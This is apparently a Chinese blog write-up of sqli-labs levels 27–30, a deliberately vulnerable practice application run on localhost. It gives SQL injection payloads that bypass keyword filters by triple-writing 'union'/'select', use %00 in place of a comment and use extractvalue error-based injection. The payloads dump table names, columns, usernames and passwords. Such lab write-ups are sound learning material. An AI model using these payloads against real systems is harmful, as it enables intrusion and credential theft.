首页 > 数据库 >sqli-labs 27到30

sqli-labs 27到30

时间:2023-05-31 17:46:07浏览次数:47  
标签:00 27 闭合 labs sqli table id concat schema

第27题

发现对select和union都进行了顾虑

select双写也进行了过滤

但是三写没有过滤哈哈(颇有种赖皮的感觉)

刚学到一手可以用%00绕过注释符过滤。

?id='uunionnion(sseselectlectelect(1),(database()),(1));%00

http://localhost/sqli-labs-php7-master/Less-27?id='uunionnion(sseselectlectelect(1),group_concat((table_name)),(1)from(information_schema.tables)where(table_schema='security'));%00

id='uunionnion(sseselectlectelect(1),group_concat((column_name)),(1)from(information_schema.columns)where(table_schema='security'%26%26table_name='users'));%00

 爆用户名密码

http://localhost/sqli-labs-php7-master/Less-27?id='uunionnion(sseselectlectelect(1),group_concat(username),(1)from(users));%00

 

第28题

可以看到这道题没有报错信息了,因此不能使用报错注入

判断闭合方式:

 发现’时出现异常,因此闭合方式中肯定有‘

判断闭合方式中是否有):
?id=2'&&'1'='1  如果返回的是id=2的值那么为'闭合否则为')闭合。

 因此为')闭合。

或者使用%00作为注释试哪个正确

 爆库名

 

 

爆列名:

id=')union(select(1),group_concat(table_name),(2)from(information_schema.tables)where(table_schema='security'));%00

 其余同理。

第29题

判断闭合方式:

 为'闭合。

 

因为是有报错信息的,所以直接使用报错注入

?id=2'||extractvalue(1,concat(0x7e,database()));%00

 这。。。不知道是不是我低估了,这真的是29关吗

?id=2'||extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema='security'))));%00

 爆列名

?id=2'||extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_schema='security'and(table_name='users')))));%00

 用户名密码

 

 这。。。

第30题

闭合方式判断:“显示错误,'显示正常,因此包含"

 

 闭合方式中没有)

且没有报错回显,因此不能用报错注入

 

标签:00,27,闭合,labs,sqli,table,id,concat,schema
From: https://www.cnblogs.com/limihacker/p/17446873.html

相关文章

  • POJ2762(判断无向图的弱连通)
    题目:http://poj.org/problem?id=2762 题意:给出n个山洞,对于每个山洞,如果任意选择两点s,e,都满足s可以到达e或者e可以到达s,则输出Yes,否则输出No。 分析:实际上判断是否弱连通,所以首先强连通,然后缩点,对缩点形成的图最多只能有一个入度为0的点,如果有多个入度为0的点,则这两个连通分量肯......
  • 2305.19270Learning without Forgetting for Vision-Language Models
    https://arxiv.org/pdf/2305.19270.pdf2305.19270.pd  AbstractClass-IncrementalLearning(CIL)orcontinuallearningisadesiredcapabilityintherealworld,whichrequiresalearningsystemtoadapttonewtaskswithoutforgettingformerones.Whiletradi......
  • 关于mysql 创建索引报错 1071 specified key was too long ;max key length is 3027
    另一种张表也是相同的字段创建索引却能成功,在网上查了一些资料。后来发现是两张表字段都用的varchar类型,不过能成功建索引的表设置的长度是50,而不能成功的表里设置的255,修改字符长度就能成功建索引了。关于varchar(50)和varchar(255)的区别:https://dba.stackexchange.com/questio......
  • .NET周报 【5月第4期 2023-05-27】
    国内文章C#使用词嵌入向量与向量数据库为大语言模型(LLM)赋能长期记忆实现私域问答机器人落地之openai接口平替https://www.cnblogs.com/gmmy/p/17430613.html在上一篇文章中我们大致讲述了一下如何通过词嵌入向量的方式为大语言模型增加长期记忆,用于落地在私域场景的问题。其......
  • F27SB 软件开发
    F27SBSoftwareDevelopment2GUICoursework1:LayoutManagerCreateadigitalclocka)Createthelayoutforyourdigitalclock.Theclockshouldhavethefollowinglayout:so:●HH-displaysthehours●MM-displaystheminutes●SS-displaystheseconds●AM/......
  • SQLite与MySQL与PostgreSQL:关系数据库的比较
    概述和功能SQLite是一个基于文件的嵌入式RDBMS,不需要任何安装或设置。反过来,这意味着应用程序不在需要启动,停止或配置的单独服务器进程下运行。这种无服务器架构使数据库能够跨平台兼容。完整的SQL数据库包含在单个磁盘文件中,所有读取和写入都直接在此磁盘文件上进行。由于数据直接......
  • sqli-labs 20到23
    第20题输入用户名密码发现是这样的页面 抓包看看,尝试cookie注入:admin'andextractvalue(1,concat(0x7e,database()))# 其他好做了。第21题抓包是这样: 看看这uname什么成分? 可以看到是对admin先进行了base64编码,然后对=进行了url编码这里尝试对admin进行base6......
  • leetcode 27. Remove Element
    Givenanarraynumsandavalueval,removeallinstancesofthatvaluein-placeandreturnthenewlength.Donotallocateextraspaceforanotherarray,youmustdothisbymodifyingtheinputarrayin-placeTheorderofelementscanbechanged.Itdoesn&......
  • leetcode 2712. 使所有字符相等的最小成本
    2712.使所有字符相等的最小成本给你一个下标从 0 开始、长度为 n 的二进制字符串 s ,你可以对其执行两种操作:选中一个下标 i 并且反转从下标 0 到下标 i(包括下标 0 和下标 i )的所有字符,成本为 i+1 。选中一个下标 i 并且反转从下标 i 到下标 n-......
  • leetcode 2707. 字符串中的额外字符
    2707.字符串中的额外字符给你一个下标从 0 开始的字符串 s 和一个单词字典 dictionary 。你需要将 s 分割成若干个 互不重叠 的子字符串,每个子字符串都在 dictionary 中出现过。s 中可能会有一些 额外的字符 不在任何子字符串中。请你采取最优策略分割 s......